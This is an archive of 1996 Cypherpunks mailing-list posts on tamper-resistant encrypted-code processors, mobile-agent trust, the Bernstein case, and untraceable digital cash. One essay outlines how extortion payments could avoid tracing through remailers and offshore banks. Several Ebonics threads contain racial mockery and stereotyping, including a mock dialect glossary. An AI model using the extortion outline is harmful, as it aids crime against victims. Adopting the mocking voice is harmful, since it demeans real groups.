At 5:14 PM -0800 12/21/96, Bill Frantz wrote:
>Let me try to sketch a design for an Encrypted Code Computer (ECC).
>
>I will start with what has become the standard architecture for Personal
>Computers/Workstations.  That is:
>
>(1) One or more CPU chips, each of which includes a RISC core, memory
>management, and L1 cache.
>(2) A L2 cache memory chip.
>(3) A main memory bus which either includes an I/O bus or,
>(4) A separate I/O bus.


A useful thing to bear in mind is that there already exists such an
"Encrypted Code Computer," though it is not usually thought of that way.
Namely, a satellite t.v. decoder (or set top box). Instead of taking in
bits from a floppy disk or whatever and decrypting so as to allow the
software to be run, it takes in bits from a satellite dish receiver,
descrambles the data, and "executes" the  resulting bitstream (in the most
common case, displaying a t.v. picture).

Whether the decryption or descrambling takes place on a specific chip or in
a system comprised of several chips is almost immaterial, except for linear
factors of complexity in defeating the copy protection/tamper resistance
measures. (Notably, epoxy gunked over the PALs or microprocessors doing the
"VideoCipher II" or "Hendrickson" unscrambling, or special measures at the
chip level.)

The issue of tamper-resistance in chips has come up half a dozen times on
this list; the archives should have a bunch of longer articles on this,
including mine. As it happens, I started Intel's lab which did electron
beam testing of microprocessors, and worked on various aspects of the
tamper-resistance issue. Basically, it's hard to stop a determined attacker.

(The motivation for a satellite box attacker is more than one might
think...it isn't just getting one set of channels for free, it's about
making N instances of an account that's been paid for, so all of these N
instances will look exactly like the box for which payments are carefully
made so as to ensure continued coverage. This is called "cloning." I submit
it's exactly analogous to defeating the Hendrickson-proposed copy
protection scheme.)


>That leaves us with decrypting in the CPU.  Most CPU chips have separate
>instruction and data L1 caches.  If we assume separate caches for our
>system, it becomes logical to decrypt the code as we load it into the L1
>cache.  If we assume that we are using public key cryptography to protect
>the programs, where the CPU chip has the only copy of the secret key, then
>we have to solve the following problems:

And don't forget that internal nodes of microproceessors can be "tapped"
with an electron beam voltage contrast system. Some steps can make this
much harder, but the principle is still that internal states are capturable.

And of course the various "shake and bake" methods so much in the news
lately. (Such methods originally developed for the satellite box cloners,
interestingly enough.)

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Sat, 21 Dec 1996 19:07:53 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: some clarification of jurisdiction in Berstein (long)
Message-ID: <01BBEF72.8B760B60@king1-05.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	attila

        The DOJ is not interested in either justice or the Bill of
    Rights. Federal attorneys are striving for high conviction rates,
    like Vietnam body counts --and are enforcing the policies of the
    administration, not the courts, the constitution, or the people.
...........................................................

(I just read this message, even though Attila posted it this past 
Thursday.)

I wanted to comment that it was a quite interesting post, because it deals 
with elements of courts and law which really baffle me - all the talk about 
which District Court stated this, and whether this will apply only in 
Northern California, and whether Judge Patel's ruling will be observed 
elsewhere or appealed to a higher court -

I think to myself, sheesh, this is like being in a maze and trying to find 
the way out:   If you go through this corridor, will you be on the straight 
path out, or is there perhaps a dead end around to the left of that edge up 
ahead, so maybe you should instead try going around that wall on the right? 
 And how do you know how close you are to the exit?   How do you know you 
aren't on a circuitous path going around & around, going nowhere?

There are so many detailed decisions, so many objections, such meticulous, 
scrupulous study of every word & potential meaning therein, and all the 
judicious players appear so knowledgeable of what is or could not be valid, 
what is or could not be moral and therefore supportable, of which decision 
made by which judge on what year relating to what number on a document this 
all relates back to.

It appears that there is a reason for the extreme concern for propriety and 
the extreme complexity in the assessment of it in a courtroom, in courtroom 
after level of courtroom.  It appears that judges and lawyers and courts 
are deeply concerned about life proceeding in a moral way, and that they 
would play the role of catching it from degrading into corruption, 
affecting the quality of life in the US.

Yet if the individual whose actions are in questions goes to jail, the 
atmosphere of intelligence or mental ability suddenly disappears, the 
delicacy towards morality and quality of behavior cuts off and there is no 
similar meticulous examination the institution wherein they are 
incarcerated, to continue ensuring that  all processes there are aligned in 
the direction of goodness.

Therefore what was it all for?   If the quality of Truth and Morality is 
being saved from corruption by these Judges of Law, then why is one 
person's decision valid only in North California, but not as soon as one 
travels south (what's the boundary line for "North" California)?  Or why 
does it "hold" in that state, but not anywhere else on the continent?

I always think in the same terms used in the Constitution - about human 
nature and other such categories of thought.  Not about where that human 
nature happens to be residing at any particular time, but what it is per 
se, and what is or is not right for it per se, regardless of whether it is 
in North or South Rhode Island.  In terms of governmental roles, I'm aghast 
that they relate their judgements back to each other rather than back to 
principles.   Because this means that, in the end, we are subordinate to 
the reasoning of some appointed individual, and subject to the lucidity of 
their mind at the particular moment that we come to their attention, as 
during a dispute regarding the publication of source code.  We could never 
refer back to valid principles of thought or the Laws of Nature in 
determing what is right or what not to do, because overriding those 
considerations would be the calculations of some public overseer.

I realize that not all lawyers & judges are this way, but it is still very 
unsettling to realize just how superficial is the 'honor' which accrues to 
them.

Thanks for the elaboration on this, Attila.

   ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lucifer@dhp.com (Anonymous)
Date: Sat, 21 Dec 1996 16:14:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <v03007801aee10fd61030@[207.167.93.63]>
Message-ID: <199612220014.TAA18204@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


> The trouble with these f*&%^*&%^* do-gooder programs is that they
> miss the point.  How are you going to teach anything using improvised
> dialect?  It's just insane.

Guys, I think you are missing the point.  Even the people who approved
this know the bilingual education stuff is a crock.  It's just a way
of getting more money for Oakland's impoverished public schools, so
that they can do a better job of actually teaching these students
proper English.  No one is proposing teaching literature classes on
Ebonic texts or anything like that.

Now, you might argue that districts with low property tax revenues
don't deserve public schools, or that those public schools should be
openbly funded without playing strange games with bilingual education.
However, there's no point in arguing they shouldn't teach Ebonic as no
one intends to teach it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 21 Dec 1996 19:34:56 -0800 (PST)
To: "Mark M." <markm@voicenet.com>
Subject: Re: Ebonics
In-Reply-To: <Pine.LNX.3.95.961221144523.595B-100000@gak.voicenet.com>
Message-ID: <32BCA854.5FF7@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Mark M. wrote:
> On Sat, 21 Dec 1996, Mark Rosen wrote:
> > There are several problems with your argument:[snippo]
> > * You are completely forgetting the other "non-English" group in America;
> > the so-called White Trash or heavy Southern accents, which are violate just
> > as many prissy and stuck up rules of grammar as Ebonics
> > * You don't have to speak ebonics. You also don't have to speak with a
> > Southern twang (or whatever the politically correct name for that is)

Just saying someone has a Southern "accent" is prejudicial and ignorant.
It's true that anyone, Southern or otherwise, can slur words so they're
not clear, but on averages, Southerners who speak clearly with their
native inflections and pronunciations are easier to understand than your
typical Yankees, whose speech is generally thin, nasal and rather pinched-
sounding.

People talked about hate in the South in the 1960's.  What a crock.
Apartheid, sure, no doubt about that.  But hate, well, I grew up in
the North and I lived for a few years in the deep South, and the people
in the South don't hate like the Yankees do, on average.

If you want to see how hate works, look how the big-media organizations
have descended on Southern radio and TV and have been telling them that
they speak wrongly, and that Southern "accents" are something to be
ashamed of.

There's a story about the Confederate officer who, following the War For
Southern Independence (not a true Civil War BTW), walked up the steps of
the veterans' club and saw a Union man sitting with a tin cup, looking
absolutely miserable with all sorts of injuries, etc.  The Southern man
tossed a dollar into the cup, at which point the astonished Union soldier
exclaimed "thank you, sir".  The next week at the club, the same thing
happened, and the soldier asked "Excuse me sir, but why would a Southern
officer such as yourself be showing so much sympathy to a Union man like
myself?"  To which the Southern officer replied "Actually it's not that,
it's just that you're the first Yankee I've seen that's been shot up
to my specifications".






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 21 Dec 1996 19:36:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "the world is half women, even though they're not on the c-punks list"
In-Reply-To: <199612210144.SAA25029@infowest.com>
Message-ID: <32BCAB5C.3682@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> At 10:20 AM -0800 12/21/96, Dale Thorn wrote:
> >Ya' know, guys, the world is half women, even though they're not on
> >the c-punks list.  Get in touch with them.  They're fun people.
> Ah, it's been a while since we had the "why aren't more women on the list?"
> discussion.
> Frankly, women are of course welcome. If the list interests them, they are
> welcome to subscribe. As it has always been.
> So, Dale, feel free to recruit more women to this and other lists. But
> don't presume from the traffic you see here--or from comments about the
> utter stupidity of little Jessica Dubroff, her pilot, her parents, and the
> complicitous news media--that we need a lecture on getting in touch with
> women.

All of this is valid (for argument's sake) except "the stupidity of
little Jessica".  She was doing well for a 7-year-old, and I was
quite proud of her. The morons who were flying that plane near weight
capacity at lower altitudes should have been shot for that alone, never
mind trying that at the altitude where they "bought the farm".

What happened to Jessica because of the selfish, greedy adults who were
involved actually gives weight to the parental licensing plan, yes?
(Ouch)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nelson Minar <nelson@media.mit.edu>
Date: Sat, 21 Dec 1996 16:34:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Running code on a machine you don't trust (was Re: Executing Encrypted Code)
In-Reply-To: <v02140b00aedf4a134af2@[192.0.2.1]>
Message-ID: <cpag20z1kp8.fsf@hattrick.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


ph@netcom.com (Peter Hendrickson) writes:
> At the last meeting references were made to processors which only
> execute encrypted code.  Decryption occurs on chip.
> If each chip has a unique public/secret key pair, and executes
> authenticated code only, there are some interesting implications.

Yes, interesting indeed. It would also partially solve a problem I've
been thinking about: how can I safely run code on a machine that I
don't trust?

I'm working on some mobile agent / distributed computation research.
The basic model is that I send an agent to a server (say, a Java
interpreter) running somewhere. A lot has been written about security,
how to protect the server from malicious agents.

But what about protecting agents from malicious servers? Possible
threat models include servers that steal an agent's propietary code
and data or servers that deliberately misexecute the agent's code. The
latter threat model is under serious consideration with the
distributed DES cracking project that's being designed now.

The ultimate solution is trusted hardware on the server end. I think,
for a variety of reasons, this is really unlikely to be widly
deployed. But bringing the trusted hardware needed down to just a
black-box CPU that decrypts on the fly is a neat idea.

Other ideas include obfuscating code (protects against theft),
splitting up your computation across multiple machines (spread the
risk of theft), independently verify the results of remote
comptuations (protects from spoofing), or build some reputation
mechanism for servers (so bad guys are identified). None of these
solutions is very satisfying.

I suspect that really guaranteeing safety to mobile agents is
impossible, or at least very difficult, without trusted hardware. But
I'm not 100% sure. There are some interesting notes in Applied Crypto
2nd about performing computations on encrypted data (p.540). These
algorithms seem to be of very limited application. Or are they?

If anyone has any thoughts on this issue, I'd love to hear them. If
you send to cypherpunks, please also mail me privately as I'm going
offline for a few days..




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 21 Dec 1996 20:02:16 -0800 (PST)
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Credentials without Identity--Race Bits
Message-ID: <199612220402.UAA16132@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:50 PM 12/20/96 -0800, Bill Stewart wrote:

>At least they weren't doing most of this paranoia when I visited my
>sister earlier this summer, bringing a couple pounds of Silly Putty
>in my luggage as presents for her kids, packed near the alarm clock....
>#			Thanks;  Bill

For years, Radio Shack has sold an indoor/outdoor thermometer with  max/min temperature function.  Going on a long trip and carrying a 5-pound loaf of cheese?  Stick the outdoor thermo pickup in the cheese before you depart, to ensure that it wasn't exposed to damaging temperature excursions!   I'm sure this looks wonderful on an X-ray.




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Sat, 21 Dec 1996 20:27:32 -0800 (PST)
To: "Matthew J. Miszewski" <mjmiski@execpc.com>
Subject: Re: Ebonics
In-Reply-To: <3.0.32.19961221180621.006965f0@mail.execpc.com>
Message-ID: <199612220425.WAA00122@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

X-Folder:

In <3.0.32.19961221180621.006965f0@mail.execpc.com>, on 12/21/96 at 08:06 PM,
   "Matthew J. Miszewski" <mjmiski@execpc.com> said:

>Why is it that personal freedom, sometimes expressed by choice of dialect
>or language, seemingly has such arbitrary limits?  Many on the list
>complain that they are subject to too many rules, and yet, seem to chime in
>on multi-linugual issues in this way.

Matt you seem to be missing the point.

As far as I can tell no one cares how individuals or in what "language"
individuals care to speak in. It is a compleetle different issue when you are talking
about a government sponcered "second language".

As with all things the government does this is just a trial balloon for bigger and
"better" things. Tax forms in Afrolish, Voting Ballots in Afrolish, matter of fact all
government documents in Afrolish. Anti-discrimination suits & laws because a perspective
employee was turned down for a job on the basis that he  can not speak English only
Afrolish.

If you look outside the political/economic spectrum you have the issues dealing with
society as a whole.
While I could write a thesis on this here are some basic question to ask:

What are the effects of having a subset of a society with the following:

 - Speak a differnt language
 - Practice a different religion
 - Have a different work ethic
 - Have a different set of moral values
 - Have a different cultural background

How will this group fair economically?
How will this group fair politically?

What are the effects of such a group violently refusing to integrate into the society as a
whole?

What historical presedents do you have to support your views?

Historical Examples:

  - Programs against the Jews in Europe & Russia
  - Turks & Armanians
  - Greeks & Turks
  - Palistinians & Jews in Israel (20th Century)



- --
- -----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
- -----------------------------------------------------------
 
Tag-O-Matic: DOS=HIGH? I knew it was on something...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMrypJ49Co1n+aLhhAQFjhQP/YuZI/aPBWqD5h7Ns3K6CtkHJzJZem+TZ
fn6tUUz6Dhoge59FPpWjjxy+jOZSAlBpVvRZWdQCMCEKdmYdj9sd9uHHbmHDwv4+
vYLkHUdx5UqHH7uMJ/JJj1aIuRjmywyo6BncBvi4PBI7e61I3zq86Ey4pigSdAmB
LaxYbfNoX6c=
=BTJx
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 21 Dec 1996 17:26:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <3.0.32.19961221180621.006965f0@mail.execpc.com>
Message-ID: <Pine.LNX.3.95.961221202657.1541A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 21 Dec 1996, Matthew J. Miszewski wrote:

> Why is it that personal freedom, sometimes expressed by choice of dialect
> or language, seemingly has such arbitrary limits?  Many on the list
> complain that they are subject to too many rules, and yet, seem to chime in
> on multi-linugual issues in this way.

I never said that the government should force people to speak a certain
language.  You are missing the main point: How do you expect to communicate
with an employee who can't speak any language that you can understand?  It's
not arbitrary at all.  In fact, it's rather simple.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.
0xf9b22ba5 now revoked

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMryPECzIPc7jvyFpAQFLJwgAw2Y64kvmBQdVPQY4DUsf36iKEd2ZqgbU
n+TCETMfG79hzJ1DgtvuLHhaOeKqQv2pLalLK6y//DVEllk/25f/iv+YQRb/RgD5
lpHw3CV8ZAgUk8563VK9V3x7sKv6D0wXYGdgUln9DnYnIYKebdhEWgDj19tuy96x
j2FL0OGa0sLqx2lazaCATSLQtHqFARqGTKUTib0bpQj3Qougz929xmWjVhRTWVlD
qFFI3QCy7g934uwk+LRhmVgOuCk4u3/Tg8ZAZYbPKT05Tibsbeazd7NnJnT0b3aG
/0FrDKPDXQQo4wFY4Bd93jdp2kvXiHCggC5bQsazG9vvFM3igMBpwA==
=ZG97
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 21 Dec 1996 20:25:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Untraceable Payments, Extortion, and Other Bad Things
Message-ID: <v03007801aee25b84a198@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




I've noticed a few references in the press, and maybe on this list, to the
idea that because some bad things may be done with untraceable payments
(true Chaumian digicash, not the watered down version offering only
one-sided untraceability), that governments will "not allow" such
untraceable payments.

This won't work. So long as there is at least *one* such service, anywhere
in the world....

I'll explain.

A few definitions:

"Bad things" are the uses to which strong crypto, anonymous systems,
information markets, untraceable payments, etc., may be put to commit
various crimes and dastardly acts. For example, untraceable payments for
untraceable contract assassinations (thus removing the primary means by
which such contractors are caught, the arrangements to begin with and the
payments). Or, espionage in which the spy transfers information digitally
via a "digital dead drop," eliminating the need for a physical contact
point (an obvious vulnerability, as recent cases have shown) and also
allowing efficient payment via untraceable funds transfers. And extortion.

Extortion is an interesting example to focus on. "Pay $25,000 or the
following action will occur." A bomb, a virus, release of secrets, etc.
Blackmail is of course a form of extortion, as is kidnapping. The acts
involving *physical* actions will of course be less affected by crypto
advances than will purely information-domain acts, e.g., where secrets will
be released unless a payment is made. Physical acts have a nexus of
detection at the act itself, the kidnapping, the bomb-planting, etc.
(Though often the original act is very hard to protect against, and
traditionally it has been the payoff that has been the nexus for catching
the perpetrator...with untraceable payments, kidnapping becomes less
dangerous for the kidnapper, especially if he kills his victim...I surmise
that new technology, such as cameras and wireless Net video calls will be
used increasingly to provide the payer of a ransom increased assurance that
the victim was still alive at the time the transfer was made...the video
call could even go through remailers, if the frame rate was drastically
reduced or if PipeNet comes into existence.)

But I'll focus on simple extortion, with no complications of physical,
meatspace actions. Pure cyberspace.

"Untraceable payments" refer to payer- and payee-untraceable Chaum-style
cash. Although for the discussions here of extortion, payee-untraceable
(the person being paid would not be traceable is my sense of this term)
digital cash would be sufficient; that the payment originated from XYZ
Corporation or some account at the Bank of Albania would not stop the acts.

Chaum has in recent years attempted (I have to presume) to take the "edge"
of fully-intraceable digital cash by making it only partly untraceable.
Many of us hypothesized that "mixes" (as in remailers) could be used to
fully-untraceabalize (?) even partly-traceable systems. I recall Lucky
Green, Hal Finney, and others in such discussions. "Banks" were proposed to
do this. Recently, Ian Goldberg claims to have a system which formally
accomplishes this.

(Keep in mind my original claim, that all it takes is _one_ such system...)

Now suppose that the U.S. Government formally and officially and with
actual enforcement halts all such untraceable systems, at least in terms of
U.S. banks, credit unions, local moneychangers, etc. Even halts all
partly-untraceable systems, to head off the Goldberg Gambit.

Does this stop extortion?

Suppose there exists a supplier of fully-untraceable (or payee-untraceable
at least) cash *somewhere* in the world. It could be a physical bank, a la
the Bank of Albania, or it could be an underground payment system, a la the
Mafia, the Tongs, the Triads, whatever. A reputation-reliant system which
says "Present us with the proper set of numbers and we will provide money
to the bearer, or follow instructions, and so on." (I'm informally
describing the process of "redeeming" a digital bearer instrument,
converting the set of numbers into some other form of specie, or item of
value, whatever. Maybe gold, maybe dollars, maybe an entry into an account
somewhere. The "untraceability," via the blinding operation, means that the
bearer is not linked to the transaction made earlier, so there is not risk
at the bank or Triad. I'm also not distinguishing between offline and
online clearing here...my feeling for a long time has been that online
clearing has many advantages, but I suspect it does not work too well in
the extortion case described here, until something like PipeNet can be used
as part of the process.)

So, Ed the Extortionist tells Vic the Victim to please purchase $25,000
worth of Bank of Albania crypto-credits, by whatever means he has to
(including, presumably, even flying to Albania, or using other funds
transfer mechanisms, or perhaps even using crypto credits he had
accumulated in other transactions.) Whatever, it is assumed that Vic
_wants_ to make the transaction, just as with kidnap ransom demands. (Not
"want" in the ultimate sense, but "want" in the sense of the local
transaction. In extortion and kidnap cases, the victim of the extortion or
the family of the kidnap victim may choose not to make the payment...I'm
dealing with the more interesting case of where the payment is being made.)

How Ed receives the funds without the bits being followed through
cyberspace is of course an easy exercise for readers here. Anonymous
remailers with reply-block capabilities, a la Mixmaster, or, my preference,
posting in a public place, a la the Usenet or other widely-disseminated
message pools.

Ed takes the crypto credits and redeems them as he sees fit (after some
unblinding stuff, of course). The redemption order is unlinkable to the
extortion. (Modulo the usual issues: if Ed and Vic happened to be the
_only_ users of such a system, then of course simple input-output mapping
would finger Ed, as with such uses of remailer networks. Correlations are
always a danger. Correlations in timing, in deposit size, etc. The usual
fixes apply: more users, more bits sloshing around the network, time
delays, etc. Offline clearing facillitates some of these measures. Ditto
for breaking up the payment into N separate smaller-denomination transfers.)

What could the U.S. do? If Vic the Victim is careful, and either flies to
Europe or the Caribbean to make the arrangements, or uses various
Cypherpunks-type communication methods, he should be able to wire money
from a conventional account, or use real cash, and purchase the crypto
credits from the Bank of Albania. Likewise, if Ed the Extortionist has
freedom of travel or freedom to use various channels, he can cash in his
crypto credits. This no matter what the U.S. does.

So, even if "Mark Twain Bank" and "Bank of America," and, indeed, the rest
of the U.S. banking establishment eschews untraceability, the presence of
such services anywhere in the world is enough to make the act described
workable. And that "anywhere in the world" can, as I mentioned earlier,
encompass the various underground banking systems already widely in use
(Tongs, Triads, chop marks, etc. in Asia, and presumably similar systems
elsewhere). Or it could encompass fairly conventional banks which offer
such untraceable routes for a premium. A $5,000 commission on top of the
$25,000 transfer would make a lot of the world's banks sit up and take
notice. And so long as they were not told what the fund transfer was all
about--Vic is unlikely to gain anything by telling them--they have
plausible deniability and moral comfort.

Yes, this has all been obvious for a while. (The mapping of the scenario I
describe to a specific digital cash system depends of course on the nature
of the system, on cryptographic protocols, and so forth.)

And I surmise that the U.S. Government must have realized this. And
realized that only by _completely quashing_ all such untraceable payments
systems can the goals of stopping such "bad uses" be met.

Unfortunately for them, and unfortunately for the victims of such crimes,
no such worldwide stoppage of all such systems seems possible, even with
draconian police state measures. There are just too many interstices for
the bits to hide. And too much economic incentive for some persons or banks
to offer such funds transfer methods.

Fortunately for the bulk of us, the likely number of deaths and economic
losses from such crimes of kidnapping, extortion, and even murder for hire,
is still likely to be vastly lower than the number of deaths caused by
powerful central governments enriching themselves and their cronies with
foreign wars. Not to mention the deaths in the Drug War, the lives wasted
in other interferences in private behavior, etc.

This is why I look forward to this Brave New World of fully untraceable
communications and fully untraceable economic transactions.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 21 Dec 1996 20:46:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "the world is half women, even though they're not on thec-punks 	 list"
In-Reply-To: <199612210144.SAA25029@infowest.com>
Message-ID: <v03007801aee26dceede3@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:30 PM -0800 12/21/96, Dale Thorn wrote:

>All of this is valid (for argument's sake) except "the stupidity of
>little Jessica".  She was doing well for a 7-year-old, and I was
>quite proud of her. The morons who were flying that plane near weight
>capacity at lower altitudes should have been shot for that alone, never
>mind trying that at the altitude where they "bought the farm".
>
>What happened to Jessica because of the selfish, greedy adults who were
>involved actually gives weight to the parental licensing plan, yes?
>(Ouch)

Well, I of course don't hold an 8-year-old very responsible for making such
a stupid decision. I was really talking about the stupidity of the entire
"stunt," which is what it was,  Her parents were pieces of newage, the news
media were willing co-involvants (it's called "manufacturing the news"),
and the pilot had little experience in icy conditions in thin air.

Even in jest, parental licensing would have done little. Jessica's dingbat
newage parents are just the type of granolaheads so favored in California
as being nurturing, gender-role-bending parental-units. They would surely
have received their Breeding Permit.

--Tim May



Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@disposable.com>
Date: Sat, 21 Dec 1996 21:25:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <v03007801aee10fd61030@[207.167.93.63]>
Message-ID: <32BCC61C.112@disposable.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> 
> Now, you might argue that districts with low property tax revenues
> don't deserve public schools, or that those public schools should be
> openbly funded without playing strange games with bilingual education.
> However, there's no point in arguing they shouldn't teach Ebonic as no
> one intends to teach it.

Of course there's a point! It's not based in fact, it's not honest, and 
it's not helpful, but there *is* a point. Call it "satire" or "straw 
man" depending on your general opinion of black people and "their" 
politics.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@disposable.com>
Date: Sat, 21 Dec 1996 22:01:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <v03007801aee22ae61b2c@[207.167.93.63]>
Message-ID: <32BCCE8A.28EF@disposable.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> At 5:49 PM -0600 12/21/96, Matthew J. Miszewski wrote:
> 
> >I realize you dont agree with the tactics of some black leaders in 
> >this country, but I dont understand why you have this need to cloak 
> >your arguments in such antagonizing language.  You, of course, are 
> >free to do so, I just find it counter-productive albeit sometimes
> >humourous.
> 
> I was speaking of "Ebonics." That many "black leaders" support so
> transparent a scam and backward step is a separate issue, though, I
> confess, not an unexpected one.

No, folks, Tim doesn't generalize.

Name one "black leader" who has endorsed anything like the straw man 
you're talking about. What we have here are a couple of kooks in charge 
of a politicized school board in Oakland. The word "ebonics" appears 
exactly zero times in Stanford's library catalog and exactly zero times 
in the indices of peer-reviewed academic journals to which I have 
access, including some very "PC" ones. DejaNews had exactly one instance 
of the word "ebonics" before this September, when someone in Oakland 
started making a fuss. The recommendations of the Oakland school board, 
which bear no resemblance to the nonsense spouted here, are no more 
representative of even the most politicized elements of black studies 
departments than certain Bible Belt public schools are of "white 
leaders."

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 21 Dec 1996 22:35:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: EBONIC.ORG
In-Reply-To: <1.5.4.32.19961221215040.006cb3d4@mail.nova1.net>
Message-ID: <v03007800aee288075e13@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:50 PM -0600 12/21/96, Chuck wrote:

>I hope the site will be up in a week or so, in the meantime, you may
>communicate via the list or directly to me at <chuck@ebonic.org>.  Remember,
>we be needin yo hep.


It gotta a homey page?


--Kool Mo Master Flash Tim










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamie@comet.net (jamie dyer)
Date: Sat, 21 Dec 1996 19:59:30 -0800 (PST)
To: Chuck <chuck@nova1.net>
Subject: Re: EBONIC.ORG
In-Reply-To: <1.5.4.32.19961221215040.006cb3d4@mail.nova1.net>
Message-ID: <Pine.BSF.3.95.961221225200.21034A-100000@atlas.comet.net>
MIME-Version: 1.0
Content-Type: text/plain


 FITTYSEN = Four bits. Half a dollar.

 FLO = The thing a rug is laid upon.

 BODE = Can be a two-by-four or any other measure of lumber.

 DUNDUN = A statement of completion. "I dundun it."

 SAYLAY = A 24 hour store. Most neighborhoods have one.

 BITCH = Female companion. Wife. Mother. Whore. You. Me. Best Friend.
jamie
------------------------------------------------------------------------------
jamie@comet.net |          Comet.Net		|  Send empty message 
		|     Charlottesville, Va.  	|  to pgpkey@comet.net 
		|        (804)295-2407		|  for pgp public key.
	        |     http://www.comet.net	|
"When buying and selling are controlled by legislation, the first things
to be bought and sold are legislators"  -P.J. O'Rourke. 
------------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 22 Dec 1996 01:37:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Language (Was:Re: Ebonics)
In-Reply-To: <Pine.LNX.3.95.961221144523.595B-100000@gak.voicenet.com>
Message-ID: <32BCDD2C.2E0@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Jamie Lawrence wrote:
> At 7:17 PM -0800 on 12/21/96, Dale Thorn wrote:
> > > > Southern twang (or whatever the politically correct name for that is)
> > Just saying someone has a Southern "accent" is prejudicial and ignorant.

> Bullshit.
> I was born and raised in Ohio. I went to middle and high school in
> Tennessee.  (This isn't a qualification, per se, for asserting what
> I'm about to assert, as any trained ape could probably defensibly
> argue. I state it only to demonstrate some first hand knowledge about
> the topic I'm at hand. As my mother has drifted from speaking "Yankee
> english" to "Rebel English" over the years, examples of which I have
> on tape, I believe I can assert some knowledge on the matter.)

